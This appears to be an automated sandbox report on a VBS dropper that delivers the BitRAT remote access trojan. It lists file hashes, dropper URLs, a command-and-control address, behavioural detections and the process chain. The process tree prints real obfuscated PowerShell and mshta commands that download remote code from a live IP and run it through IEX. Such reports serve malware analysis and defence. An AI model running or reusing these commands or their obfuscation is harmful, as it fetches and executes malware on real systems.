AudioApplication.vbs
AudioApplication.vbs
3KB
19-01-2022 07:09
257cb7d47ef7b5221bd8d95cbdd7f47e
0f4cb975fbaf27684908503de9476a2d02646734
b425d52cfdada3b73bdc0cb7bbcb57b72f2b2b95182dbc2d61fafecdcc6aa5f9
Extracted
Language | hta |
Source |
|
URLs |
hta.dropper
http://185.7.214.7/BITRA/oo.html |
Extracted
Language | ps1 |
Deobfuscated |
|
URLs |
ps1.dropper
http://185.7.214.7/BITRA/AU.PNG |
Extracted
Language | ps1 |
Deobfuscated |
|
URLs |
ps1.dropper
http://185.7.214.7/BITRA/YES.PNG |
Extracted
Family | bitrat |
Version | 1.38 |
C2 |
185.7.214.8:4884 |
Attributes |
communication_password 311f4e4b7562e9d5ba31bd6afa686479
tor_process tor |
Filter: none
-
BitRAT
Description
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
Tags
-
Blocklisted process makes network requestmshta.exepowershell.exepowershell.exe
Reported IOCs
flow pid process 4 516 mshta.exe 5 1992 powershell.exe 6 2020 powershell.exe -
UPX packed file
Description
Detects executables packed with UPX/modified UPX open source packer.
Tags
Reported IOCs
resource yara_rule behavioral1/memory/1768-69-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral1/memory/1768-70-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral1/memory/1768-71-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral1/memory/1768-72-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral1/memory/1768-74-0x0000000000400000-0x00000000007E4000-memory.dmp upx -
Suspicious use of NtSetInformationThreadHideFromDebuggerRegSvcs.exe
Reported IOCs
pid process 1768 RegSvcs.exe 1768 RegSvcs.exe 1768 RegSvcs.exe 1768 RegSvcs.exe -
Suspicious use of SetThreadContextpowershell.exe
Reported IOCs
description pid process target process PID 1992 set thread context of 1768 1992 powershell.exe RegSvcs.exe -
Enumerates physical storage devices
Description
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
TTPs
-
Modifies Internet Explorer settingsmshta.exe
Tags
TTPs
Reported IOCs
description ioc process Key created \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcessespowershell.exepowershell.exe
Reported IOCs
pid process 1992 powershell.exe 2020 powershell.exe -
Suspicious use of AdjustPrivilegeTokenpowershell.exepowershell.exeRegSvcs.exe
Reported IOCs
description pid process Token: SeDebugPrivilege 1992 powershell.exe Token: SeDebugPrivilege 2020 powershell.exe Token: SeDebugPrivilege 1768 RegSvcs.exe Token: SeShutdownPrivilege 1768 RegSvcs.exe -
Suspicious use of SetWindowsHookExRegSvcs.exe
Reported IOCs
pid process 1768 RegSvcs.exe 1768 RegSvcs.exe -
Suspicious use of WriteProcessMemoryWScript.exemshta.exepowershell.exe
Reported IOCs
description pid process target process PID 524 wrote to memory of 516 524 WScript.exe mshta.exe PID 524 wrote to memory of 516 524 WScript.exe mshta.exe PID 524 wrote to memory of 516 524 WScript.exe mshta.exe PID 516 wrote to memory of 2020 516 mshta.exe powershell.exe PID 516 wrote to memory of 2020 516 mshta.exe powershell.exe PID 516 wrote to memory of 2020 516 mshta.exe powershell.exe PID 516 wrote to memory of 1992 516 mshta.exe powershell.exe PID 516 wrote to memory of 1992 516 mshta.exe powershell.exe PID 516 wrote to memory of 1992 516 mshta.exe powershell.exe PID 1992 wrote to memory of 1768 1992 powershell.exe RegSvcs.exe PID 1992 wrote to memory of 1768 1992 powershell.exe RegSvcs.exe PID 1992 wrote to memory of 1768 1992 powershell.exe RegSvcs.exe PID 1992 wrote to memory of 1768 1992 powershell.exe RegSvcs.exe PID 1992 wrote to memory of 1768 1992 powershell.exe RegSvcs.exe PID 1992 wrote to memory of 1768 1992 powershell.exe RegSvcs.exe PID 1992 wrote to memory of 1768 1992 powershell.exe RegSvcs.exe PID 1992 wrote to memory of 1768 1992 powershell.exe RegSvcs.exe PID 1992 wrote to memory of 1768 1992 powershell.exe RegSvcs.exe PID 1992 wrote to memory of 1768 1992 powershell.exe RegSvcs.exe PID 1992 wrote to memory of 1768 1992 powershell.exe RegSvcs.exe
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AudioApplication.vbs"Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" http://185.7.214.7/BITRA/oo.htmlBlocklisted process makes network requestModifies Internet Explorer settingsSuspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='({end}{end}Ne{end}{end}w{end}-Obj{end}ec{end}{end}t N{end}{end}et{end}.W{end}{end}e'.replace('{end}', ''); $c4='bC{end}li{end}{end}en{end}{end}t).D{end}{end}ow{end}{end}nl{end}{end}{end}o'.replace('{end}', ''); $c3='ad{end}{end}St{end}rin{end}{end}g{end}(''ht{end}tp{end}://185.7.214.7/BITRA/AU.PNG'')'.replace('{end}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`XBlocklisted process makes network requestSuspicious behavior: EnumeratesProcessesSuspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({end}{end}Ne{end}{end}w{end}-Obj{end}ec{end}{end}t N{end}{end}et{end}.W{end}{end}e'.replace('{end}', ''); $c4='bC{end}li{end}{end}en{end}{end}t).D{end}{end}ow{end}{end}nl{end}{end}{end}o'.replace('{end}', ''); $c3='ad{end}{end}St{end}rin{end}{end}g{end}(''ht{end}tp{end}://185.7.214.7/BITRA/YES.PNG'')'.replace('{end}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`XBlocklisted process makes network requestSuspicious use of SetThreadContextSuspicious behavior: EnumeratesProcessesSuspicious use of AdjustPrivilegeTokenSuspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Suspicious use of NtSetInformationThreadHideFromDebuggerSuspicious use of AdjustPrivilegeTokenSuspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5491e4953bc08a51d076eea36b52fe963
SHA1cb05518529a74566781411bc61ba1c2415613c71
SHA25619f295480e74354e858c88c4e78b4942ebe3095488a55dd1dee277f287bb5037
SHA512a4a3ea21092a4780004db1db77e2a09bb2d2dfe5688ca2dfadf56be4ca44934c5b759ec09a03d9b44df7b4c6ec8508c877d8ae6bd1993e5216a5cdd26dce95b3
-
memory/524-53-0x000007FEFC0E1000-0x000007FEFC0E3000-memory.dmp
-
memory/1768-74-0x0000000000400000-0x00000000007E4000-memory.dmp
-
memory/1768-73-0x0000000075531000-0x0000000075533000-memory.dmp
-
memory/1768-72-0x0000000000400000-0x00000000007E4000-memory.dmp
-
memory/1768-71-0x0000000000400000-0x00000000007E4000-memory.dmp
-
memory/1768-70-0x0000000000400000-0x00000000007E4000-memory.dmp
-
memory/1768-69-0x0000000000400000-0x00000000007E4000-memory.dmp
-
memory/1768-68-0x0000000000400000-0x00000000007E4000-memory.dmp
-
memory/1768-75-0x0000000000401000-0x00000000007E4000-memory.dmp
-
memory/1992-63-0x0000000002642000-0x0000000002644000-memory.dmp
-
memory/1992-66-0x000000000264B000-0x000000000266A000-memory.dmp
-
memory/1992-59-0x000007FEEE3C0000-0x000007FEEEF1D000-memory.dmp
-
memory/1992-65-0x0000000002644000-0x0000000002647000-memory.dmp
-
memory/1992-61-0x0000000002640000-0x0000000002642000-memory.dmp
-
memory/2020-60-0x00000000025F0000-0x00000000026F2000-memory.dmp
-
memory/2020-64-0x00000000026F4000-0x00000000026F7000-memory.dmp
-
memory/2020-58-0x000007FEEE3C0000-0x000007FEEEF1D000-memory.dmp
-
memory/2020-62-0x00000000026F2000-0x00000000026F4000-memory.dmp
-
memory/2020-67-0x00000000026FB000-0x000000000271A000-memory.dmp